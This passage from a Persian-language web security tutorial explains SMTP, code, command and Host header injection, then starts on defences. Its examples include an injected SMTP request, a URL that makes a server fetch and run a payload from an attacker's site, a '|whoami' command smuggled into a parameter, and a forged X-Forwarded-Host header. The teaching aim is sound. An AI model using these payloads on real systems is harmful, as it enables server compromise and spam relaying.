\u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628 \u0628\u0627 \u06cc\u06a9 \u0633\u0631\u0648\u06cc\u0633 \u0627\u0631\u0627\u0626\u0647 \u0627\u06cc\u0645\u06cc\u0644 (webmail) \u0631\u0627 \u062a\u0635\u0648\u0631 \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u062f\u0686\u0627\u0631 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc SMTP Injection \u00a0\u0645\u06cc\u200c\u0628\u0627\u0634\u062f. \u0646\u0641\u0648\u0630\u06af\u0631 \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u06cc \u0628\u0627 \u0645\u062a\u062f POST \u0645\u0634\u0627\u0628\u0647 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0632\u06cc\u0631 \u0631\u0627 \u0628\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/p>\n
POST http:\/\/<webmail>\/compose.php HTTP\/1.1\u00a0 \r\n\r\n-----------------------------134475172700422922879687252\u00a0 \r\n\r\nContent-Disposition: form-data; name=\"subject\"\u00a0 \r\n\r\nTest\r\n\r\n .\r\n\r\nMAIL FROM: external@domain1.com\u00a0 \r\n\r\nRCPT TO: external@domain1.com\u00a0 \r\n\r\nRCPT TO: external@domain2.com\u00a0 \r\n\r\nRCPT TO: external@domain3.com\u00a0 \r\n\r\nRCPT TO: external@domain4.com\u00a0 \r\n\r\nData\u00a0 \r\n\r\nSMTP Injection attack\u00a0 \r\n\r\n.\u00a0 \r\n\r\n-----------------------------134475172700422922879687252\u00a0 \r\n\r\n...<\/pre>\n
\u0647\u0645\u0627\u0646\u0637\u0648\u0631 \u06a9\u0647 \u06af\u0641\u062a\u0647 \u0634\u062f\u060c \u0627\u06cc\u0646 \u0628\u0631\u0646\u0627\u0645\u0647 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0628\u0648\u062f\u0647 \u0648 \u0627\u06cc\u0646 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0631\u0627 \u0628\u0647 \u062f\u0631\u0633\u062a\u06cc \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0646\u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f. \u067e\u0633 \u0627\u06cc\u0646 \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u060c \u0645\u0646\u062c\u0631 \u0628\u0647 \u0627\u062c\u0631\u0627 \u0634\u062f\u0646 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u062f\u0631 mail Server \u0627\u06cc\u0646 \u0628\u0631\u0646\u0627\u0645\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f:<\/p>\n
MAIL FROM: <mailfrom>\u00a0 \r\n\r\nRCPT TO: <rcptto>\u00a0 \r\n\r\nDATA\u00a0 \r\n\r\nSubject: Test\u00a0 \r\n\r\n.\u00a0 \r\n\r\nMAIL FROM: external@domain.com\u00a0\r\n\r\n RCPT TO: external@domain1.com\u00a0 \r\n\r\nRCPT TO: external@domain2.com\u00a0 \r\n\r\nRCPT TO: external@domain3.com\u00a0 \r\n\r\nRCPT TO: external@domain4.com\u00a0 \r\n\r\nDATA\u00a0 \r\n\r\nSMTP Injection attack\u00a0 \r\n\r\n. \r\n\r\n...<\/pre>\n
\u062f\u0631 \u0646\u062a\u06cc\u062c\u0647\u200c\u06cc \u0627\u062c\u0631\u0627 \u0634\u062f\u0646 \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u067e\u06cc\u0627\u0645\u200c\u0647\u0627\u06cc\u06cc \u0628\u0627 \u0645\u062d\u062a\u0648\u0627\u06cc \u062f\u0644\u062e\u0648\u0627\u0647 \u0646\u0641\u0648\u0630\u06af\u0631 \u062f\u0631 \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u060c \u0628\u0627 \u0639\u0628\u0627\u0631\u062a Data \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 \u0634\u062f\u0647 \u0648 \u0628\u0647 \u0627\u06cc\u0645\u06cc\u0644\u200c\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627\u06cc RCPT TO \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f. RCPT \u0627\u0634\u0627\u0631\u0647 \u0628\u0647 \u0648\u0627\u0698\u0647 recipient \u062f\u0627\u0631\u062f \u06a9\u0647 \u0628\u0647 \u0645\u0639\u0646\u0627\u06cc \u200c\u06af\u06cc\u0631\u0646\u062f\u0647 \u0627\u0633\u062a.<\/p>\n
\u062d\u0645\u0644\u0647 <\/strong>Code Injection<\/strong><\/h4>\n
\u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u0648\u0627\u0633\u0637\u0647\u200c\u06cc \u06cc\u06a9 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc\u060c \u062f\u0631 \u0646\u0633\u062e\u0647\u200c\u06cc \u0632\u0628\u0627\u0646 \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u062f\u0631 \u0633\u0645\u062a \u0633\u0631\u0648\u0631\u060c \u0645\u0627\u0646\u0646\u062f PHP\u060cASP \u0648 … \u06cc\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0645\u0646\u0637\u0642\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u062f\u0631 \u0628\u0631\u0646\u0627\u0645\u0647 \u0646\u0648\u06cc\u0633\u06cc \u0628\u06a9\u200c\u0627\u0646\u062f\u060c \u0628\u0647 \u0648\u062c\u0648\u062f \u0628\u06cc\u0627\u06cc\u062f. \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0631\u0627 \u0628\u0627 \u0646\u0627\u0645 Remote Code Execution (\u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631) \u06cc\u0627 \u0628\u0647 \u0637\u0648\u0631 \u0645\u062e\u062a\u0635\u0631 RCE \u0647\u0645 \u0645\u06cc\u200c\u0634\u0646\u0627\u0633\u0646\u062f. \u0627\u062c\u0631\u0627\u06cc \u0645\u0648\u0641\u0642\u06cc\u062a \u0622\u0645\u06cc\u0632 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0628\u0647 \u0645\u0639\u0646\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642 \u0634\u062f\u0646 \u06cc\u06a9 \u0642\u0637\u0639\u0647 \u06a9\u062f \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 \u0633\u0627\u062e\u062a\u0627\u0631 \u0628\u0631\u0646\u0627\u0645\u0647 \u0648 \u0627\u062c\u0631\u0627 \u0634\u062f\u0646 \u0622\u0646 \u062a\u0648\u0633\u0637 \u0633\u0631\u0648\u0631 \u0627\u0633\u062a \u06a9\u0647 \u0628\u0633\u062a\u0647 \u0628\u0647 \u0645\u06cc\u0632\u0627\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0631\u0646\u0627\u0645\u0647 \u062f\u0631 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0646\u0641\u0648\u0630\u06af\u0631\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062a\u0628\u0639\u0627\u062a \u0645\u062a\u0641\u0627\u0648\u062a\u06cc \u0631\u0627 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f. \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0627 \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0642\u0627\u062f\u0631 \u0627\u0633\u062a \u062d\u0645\u0644\u0627\u062a\u06cc \u062f\u06cc\u06af\u0631 \u0645\u0627\u0646\u0646\u062f Command Injection \u0631\u0627 \u0646\u06cc\u0632 \u067e\u06cc\u0627\u062f\u0647 \u0633\u0627\u0632\u06cc \u06a9\u0646\u062f.<\/p>\n
$\"\"$ <\/p>\n
\u0645\u062b\u0627\u0644:<\/p>\n
\u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628\u060c \u0628\u0631\u0627\u06cc \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u06cc\u06a9 \u0635\u0641\u062d\u0647 \u0628\u0627 \u0622\u062f\u0631\u0633 \u0632\u06cc\u0631\u060c \u0627\u0632 \u0639\u0645\u0644\u06a9\u0631\u062f eval() \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n
http:\/\/vulnerable-site.com\/?path=support.php<\/pre>\n
\u062d\u0627\u0644 \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0631\u0627\u06cc \u0622\u0632\u0645\u0648\u0646 \u0646\u0641\u0648\u0630\u067e\u0630\u06cc\u0631\u06cc \u0627\u06cc\u0646 \u0628\u0631\u0646\u0627\u0645\u0647 \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0647\u200c\u06cc RCE\u060c \u0622\u062f\u0631\u0633 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 \u062d\u0627\u0648\u06cc \u06a9\u062f \u0645\u062f\u0646\u0638\u0631\u060c \u062f\u0631 \u0633\u0627\u06cc\u062a \u062e\u0648\u062f \u0631\u0627 \u062f\u0631 \u067e\u0627\u0631\u0627\u0645\u062a\u0631 path\u060c \u0628\u0647 \u0635\u0648\u0631\u062a \u0632\u06cc\u0631 \u062c\u0627\u06af\u0630\u0627\u0631\u06cc \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n
http:\/\/vulnerable-site.com\/?path=http:\/\/attacker-website\/paylaod.php<\/pre>\n
\u0628\u0647 \u062f\u0644\u06cc\u0644 \u0627\u06cc\u0646\u06a9\u0647 \u0627\u06cc\u0646 \u0628\u0631\u0646\u0627\u0645\u0647 \u0627\u0639\u062a\u0628\u0627\u0631 \u0633\u0646\u062c\u06cc \u062f\u0631\u0633\u062a\u06cc \u0631\u0648\u06cc \u0627\u06cc\u0646 \u0648\u0631\u0648\u062f\u06cc \u0627\u0646\u062c\u0627\u0645 \u0646\u0645\u06cc\u200c\u062f\u0647\u062f\u060c \u0641\u0627\u06cc\u0644 payload.php \u062a\u0648\u0633\u0637 \u0633\u0631\u0648\u0631 \u0633\u0627\u06cc\u062a \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0627\u062c\u0631\u0627 \u0634\u062f\u0647 \u0648 \u0627\u0632 \u0627\u06cc\u0646 \u0637\u0631\u06cc\u0642\u060c \u0646\u0641\u0648\u0630\u06af\u0631 \u0642\u0627\u062f\u0631 \u0627\u0633\u062a \u062a\u0627 \u062d\u0645\u0644\u0627\u062a\u06cc \u062f\u06cc\u06af\u0631 \u0631\u0627 \u0647\u0645 \u067e\u06cc\u0627\u062f\u0647\u200c\u200c\u0633\u0627\u0632\u06cc \u0646\u0645\u0627\u06cc\u062f.<\/p>\n
\u062d\u0645\u0644\u0647 <\/strong>Command Injection<\/strong><\/h4>\n
\u0628\u0647 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0628\u0647 \u0637\u0648\u0631 \u06a9\u0627\u0645\u0644\u200c\u062a\u0631\u060c OS Command Injection \u0646\u06cc\u0632 \u06af\u0641\u062a\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0628\u0647 \u0645\u0639\u0646\u0627\u06cc \u062a\u0632\u0631\u06cc\u0642 \u0641\u0631\u0645\u0627\u0646 \u0633\u06cc\u0633\u062a\u0645 \u0639\u0627\u0645\u0644 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0632\u0645\u0627\u0646\u06cc\u200c \u0631\u062e \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u0646\u0641\u0648\u0630\u06af\u0631\u060c \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u062e\u0637 \u0641\u0631\u0645\u0627\u0646(\u0648\u06cc\u0646\u062f\u0648\u0632\u06cc \u06cc\u0627 \u06cc\u0648\u0646\u06cc\u06a9\u0633\u06cc) \u0631\u0627\u060c \u0628\u0647 \u0646\u0642\u0637\u0647\u200c\u200c\u0627\u06cc \u0627\u0632 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0647 \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u062f\u0631\u0633\u062a\u06cc \u0628\u0631 \u0622\u0646 \u0627\u0646\u062c\u0627\u0645 \u0646\u0634\u062f\u0647 \u0627\u0633\u062a\u060c \u062a\u0632\u0631\u06cc\u0642 \u0646\u0645\u0648\u062f\u0647 \u0648 \u0648\u0628\u200c\u0633\u0631\u0648\u0631 \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u062f. \u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u06a9\u0647 \u0646\u0641\u0648\u0630\u06af\u0631\u060c \u0642\u0627\u0628\u0644\u06cc\u062a \u0627\u062c\u0631\u0627\u06cc \u0641\u0631\u0645\u0627\u0646 \u0631\u0627 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u0631\u0627\u062d\u062a\u06cc \u0627\u0642\u062f\u0627\u0645 \u0628\u0647 \u0633\u0631\u0642\u062a \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u06cc\u0627 \u0646\u0635\u0628 \u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u0645\u062e\u0631\u0628 \u0628\u0646\u0645\u0627\u06cc\u062f \u06a9\u0647 \u0627\u06cc\u0646 \u0627\u0645\u0631 \u0645\u06cc\u062a\u0648\u0627\u0646\u062f \u0645\u0646\u062c\u0631 \u0628\u0647 \u0628\u0627\u0644\u0627 \u0631\u0641\u062a\u0646 \u0634\u062f\u062a \u062d\u0645\u0644\u0647 \u0634\u0648\u062f.<\/p>\n
\u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u062f\u06cc\u06af\u0631\u060c \u0645\u0627\u0646\u0646\u062f \u0645\u0648\u0627\u0631\u062f \u0632\u06cc\u0631 \u0647\u0645 \u0642\u0627\u0628\u0644 \u0627\u062c\u0631\u0627 \u0645\u06cc\u200c\u0628\u0627\u0634\u062f:<\/p>\n
\n
Insecure Deserialization<\/strong><\/li>\n
XML Injection<\/strong><\/li>\n
File Inclution\/Upload<\/strong><\/li>\n<\/ul>\n
\u0645\u062b\u0627\u0644:<\/p>\n
\u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628\u060c \u0635\u0641\u062d\u0627\u062a \u062e\u0648\u062f \u0631\u0627 \u0628\u0627 \u067e\u0627\u0631\u0627\u0645\u062a\u0631 param \u0645\u0634\u0627\u0628\u0647 \u0622\u062f\u0631\u0633 \u0632\u06cc\u0631\u060c \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n
https:\/\/vulnerable-website\/endpoint?param=1<\/pre>\n
\u062d\u0627\u0644\u060c \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0631\u0627\u06cc \u0627\u0637\u0644\u0627\u0639 \u0627\u0632 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0628\u0648\u062f\u0646 \u0628\u0631\u0646\u0627\u0645\u0647 \u0628\u0647 \u062d\u0645\u0644\u0647\u200c\u06cc Command Injection\u060c \u0641\u0631\u0645\u0627\u0646 whoami \u0631\u0627 \u0628\u0647 \u0634\u06a9\u0644 \u0632\u06cc\u0631 \u0628\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u062a\u0632\u0631\u06cc\u0642 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n
https:\/\/vulnerable-website\/endpoint?param=1|whoami<\/pre>\n
\u0628\u0647 \u062f\u0644\u06cc\u0644 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0628\u0648\u062f\u0646 \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u0641\u0631\u0645\u0627\u0646 \u0646\u0641\u0648\u0630\u06af\u0631 \u062f\u0631 \u0633\u0631\u0648\u0631 \u0627\u062c\u0631\u0627 \u0634\u062f\u0647 \u0646\u062a\u06cc\u062c\u0647 \u0628\u0631 \u0631\u0648\u06cc \u0645\u0631\u0648\u0631\u06af\u0631 \u0638\u0627\u0647\u0631 \u0645\u06cc\u200c\u0634\u0648\u062f. \u062d\u0627\u0644 \u0627\u0648 \u0642\u0627\u062f\u0631 \u0627\u0633\u062a \u06a9\u0647 \u0628\u0627 \u06af\u0633\u062a\u0631\u0634 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0622\u0633\u06cc\u0628\u200c\u0647\u0627\u06cc \u0628\u06cc\u0634\u062a\u0631\u06cc \u0628\u0647 \u0633\u0631\u0648\u0631 \u0628\u0631\u0646\u0627\u0645\u0647 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0648\u0627\u0631\u062f \u06a9\u0646\u062f.<\/p>\n
\u062d\u0645\u0644\u0647 Host Header Injection<\/strong><\/h4>\n
Header \u06cc\u0627 \u0633\u0631\u0628\u0631\u06af Host\u060c \u0627\u0632 \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u200c\u0647\u0627\u06cc\u06cc \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0647\u0627\u06cc \u06a9\u0627\u0631\u0628\u0631\u060c \u0628\u0647 \u0633\u0645\u062a \u0633\u0631\u0648\u0631 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u0648\u0628\u060c \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f \u0648 \u062a\u0639\u06cc\u06cc\u0646 \u06a9\u0646\u0646\u062f\u0647\u200c\u06cc Host \u06cc\u0627 \u0645\u06cc\u0632\u0628\u0627\u0646 \u0628\u0631\u0646\u0627\u0645\u0647 \u0648\u0628 \u06af\u0641\u062a\u0647 \u0634\u062f\u0647\u060c \u0645\u06cc\u200c\u0628\u0627\u0634\u062f. \u0628\u0647 \u062f\u0644\u06cc\u0644 \u0627\u06cc\u0646\u06a9\u0647 Host\u060c \u0627\u0632 \u0633\u0631\u0628\u0631\u06af \u0647\u0627\u06cc \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u200c\u0647\u0627\u06cc Http \u0645\u06cc\u200c\u0628\u0627\u0634\u062f\u060c \u0645\u0634\u0627\u0647\u062f\u0647 \u0648 \u0627\u06cc\u062c\u0627\u062f \u062a\u063a\u06cc\u06cc\u0631 \u062f\u0631 \u0622\u0646\u060c \u0646\u06cc\u0627\u0632\u0645\u0646\u062f \u067e\u0631\u0648\u06a9\u0633\u06cc \u062f\u0627\u062e\u0644\u06cc \u0648 \u0631\u0647\u06af\u06cc\u0631\u06cc \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u200c\u0647\u0627\u06cc \u0645\u0631\u0648\u0631\u06af\u0631 \u0645\u06cc\u200c\u0628\u0627\u0634\u062f. \u062f\u0631 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647\u060c \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0627 \u0627\u06cc\u062c\u0627\u062f \u062a\u063a\u06cc\u06cc\u0631 \u062f\u0631 \u0648\u0631\u0648\u062f\u06cc \u0627\u06cc\u0646 \u0647\u062f\u0631 \u06cc\u0627 \u0647\u062f\u0631\u0647\u0627\u06cc \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 \u0622\u0646 \u0645\u0627\u0646\u0646\u062f X-Forwaded-Host\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0627\u0639\u062b \u0627\u06cc\u062c\u0627\u062f \u062d\u0645\u0644\u0627\u062a\u06cc \u0627\u0632 \u062c\u0645\u0644\u0647 \u062d\u0645\u0644\u0627\u062a \u0632\u06cc\u0631 \u0634\u0648\u062f:<\/p>\n
\n
\u0622\u0644\u0648\u062f\u0647 \u06a9\u0631\u062f\u0646 \u06a9\u0634 \u0648\u0628 (Web Cache Poisoning)<\/li>\n
\u0645\u0633\u0645\u0648\u0645\u200c\u0633\u0627\u0632\u06cc \u062a\u063a\u06cc\u06cc\u0631 \u0631\u0645\u0632\u200c\u0639\u0628\u0648\u0631 (Password Reset Poisoning)<\/li>\n
\u062c\u0639\u0644 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0633\u0645\u062a \u0633\u0631\u0648\u0631 (SSRF)<\/li>\n
\u062f\u0648\u0631 \u0632\u062f\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a<\/li>\n<\/ul>\n
\u0645\u062b\u0627\u0644:<\/p>\n
\u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647 \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0648\u0628\u060c \u0627\u0639\u062a\u0628\u0627\u0631 \u0633\u0646\u062c\u06cc \u062f\u0631\u0633\u062a\u06cc \u0631\u0648\u06cc \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627\u06cc \u0642\u0627\u0628\u0644 \u062f\u0633\u062a\u0631\u0633\u06cc \u06a9\u0627\u0631\u0628\u0631 \u0627\u0646\u062c\u0627\u0645 \u0646\u0645\u06cc\u200c\u062f\u0647\u062f. \u06cc\u06a9 \u0646\u0641\u0648\u0630\u06af\u0631 \u0628\u0631\u0627\u06cc \u0627\u062c\u0631\u0627\u0621 \u062d\u0645\u0644\u0647\u200c\u06cc Host Header Injection\u060c \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0632\u06cc\u0631 \u0631\u0627 \u0628\u0647 \u0628\u0631\u0646\u0627\u0645\u0647 \u0627\u0631\u0633\u0627\u0644 \u0645\u06cc\u200c\u0646\u0645\u0627\u06cc\u062f:<\/p>\n
GET \/ HTTP\/1.1\r\nHost: www.example.com\r\nX-Forwarded-Host<\/strong>: <\/strong>www.attacker.com<\/strong><\/pre>\n
\u0628\u0639\u062f \u0627\u0632 \u0627\u0631\u0633\u0627\u0644 \u0634\u062f\u0646 \u0627\u06cc\u0646 \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u060c \u0633\u0627\u06cc\u062a \u0646\u0641\u0648\u0630\u06af\u0631 \u062a\u0648\u0633\u0637 \u062f\u0631\u06cc\u0627\u0641\u062a \u067e\u06cc\u063a\u0627\u0645 Redirect \u062f\u0631 \u0645\u0631\u0648\u0631\u06af\u0631 \u0648\u06cc \u0646\u0645\u0627\u06cc\u0634 \u062f\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f. \u067e\u0633 \u062f\u0631 \u0646\u062a\u06cc\u062c\u0647 \u0627\u0648 \u0645\u062a\u0648\u062c\u0647 \u0648\u062c\u0648\u062f \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062f\u0631 \u0633\u0627\u06cc\u062a \u0642\u0631\u0628\u0627\u0646\u06cc \u0634\u062f\u0647 \u0648 \u0628\u0647 \u06af\u0633\u062a\u0631\u0634 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0645\u06cc\u200c\u067e\u0631\u062f\u0627\u0632\u062f.<\/p>\n
\u0627\u0645\u0646\u200c\u0633\u0627\u0632\u06cc \u062f\u0631 \u0628\u0631\u0627\u0628\u0631 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 \u0686\u06af\u0648\u0646\u0647 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f\u061f<\/strong><\/h3>\n
\u0628\u0627 \u0645\u0631\u0648\u0631 \u0645\u062e\u062a\u0635\u0631 \u0627\u0646\u0648\u0627\u0639 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642\u060c \u0645\u062a\u0648\u062c\u0647 \u062f\u0644\u0627\u06cc\u0644\u06cc \u0645\u0634\u0627\u0628\u0647 \u062f\u0631 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0628\u0648\u062f\u0646 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627 \u0645\u06cc\u200c\u0634\u0648\u06cc\u0645 \u06a9\u0647 \u062a\u0648\u062c\u0647 \u0628\u0647 \u0627\u06cc\u0646 \u062f\u0644\u0627\u06cc\u0644\u060c \u062f\u0631 \u062a\u0639\u06cc\u06cc\u0646 \u0631\u0627\u0647\u06a9\u0627\u0631\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0628\u0631\u0627\u06cc \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0627\u062a \u0645\u0627 \u06a9\u0645\u06a9 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u062a\u0639\u062f\u0627\u062f\u06cc \u0627\u0632 \u0631\u0627\u0647\u06a9\u0627\u0631\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0628\u0631\u0627\u06cc \u067e\u06cc\u0634\u06af\u06cc\u0631\u06cc \u06a9\u0644\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 \u0634\u0627\u0645\u0644 \u0645\u0648\u0627\u0631\u062f \u0632\u06cc\u0631 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f:<\/p>\n
\u067e\u0627\u0631\u0627\u0645\u062a\u0631 \u0633\u0627\u0632\u06cc<\/strong><\/h4>\n
\u0627\u06af\u0631 \u0627\u0645\u06a9\u0627\u0646 \u0622\u0646 \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f\u060c \u0627\u0632 \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645\u200c\u0647\u0627\u06cc \u0633\u0627\u062e\u062a\u0627\u0631 \u06cc\u0627\u0641\u062a\u0647\u200c\u0627\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u0628\u0647 \u0637\u0648\u0631 \u062e\u0648\u062f\u06a9\u0627\u0631\u060c \u062a\u0641\u06a9\u06cc\u06a9 \u0628\u06cc\u0646 \u062f\u0627\u062f\u0647 \u0648 \u0641\u0631\u0645\u0627\u0646 \u0631\u0627 \u0627\u0639\u0645\u0627\u0644 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.<\/p>\n
\u0627\u0639\u0628\u0627\u0631 \u0633\u0646\u062c\u06cc \u0648\u0631\u0648\u062f\u06cc<\/strong><\/h4>\n
\u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0648 \u0622\u0631\u06af\u0648\u0645\u0627\u0646\u200c\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u062a\u0648\u0633\u0637 \u06a9\u0627\u0631\u0628\u0631 \u0642\u0627\u0628\u0644 \u062a\u063a\u06cc\u06cc\u0631\u0627\u0646\u062f \u0628\u0627\u06cc\u062f \u0627\u0639\u062a\u0628\u0627\u0631 \u0633\u0646\u062c\u06cc \u0634\u0648\u0646\u062f. \u062f\u0631 \u0627\u06cc\u0646\u062c\u0627 \u062f\u0631\u062c\u0627\u062a \u0645\u062e\u062a\u0644\u0641\u06cc \u0627\u0632 \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0648\u0631 \u0648\u0627\u0642\u0639\u06cc \u0648 \u0622\u0631\u06af\u0648\u0645\u0627\u0646\u200c\u0647\u0627\u06cc \u0622\u0646 \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f:<\/p>\n
\n
\u0648\u0642\u062a\u06cc \u0627\u0632 \u06cc\u06a9 \u062f\u0633\u062a\u0648\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f\u060c \u0628\u0627\u06cc\u062f \u0637\u0628\u0642 \u06cc\u06a9 \u0644\u06cc\u0633\u062a \u0627\u0632 \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0645\u062c\u0627\u0632 (Alow-List) \u0627\u0639\u062a\u0628\u0627\u0631 \u0633\u0646\u062c\u06cc \u0628\u0647 \u0639\u0645\u0644 \u0628\u06cc\u0627\u06cc\u062f.<\/li>\n
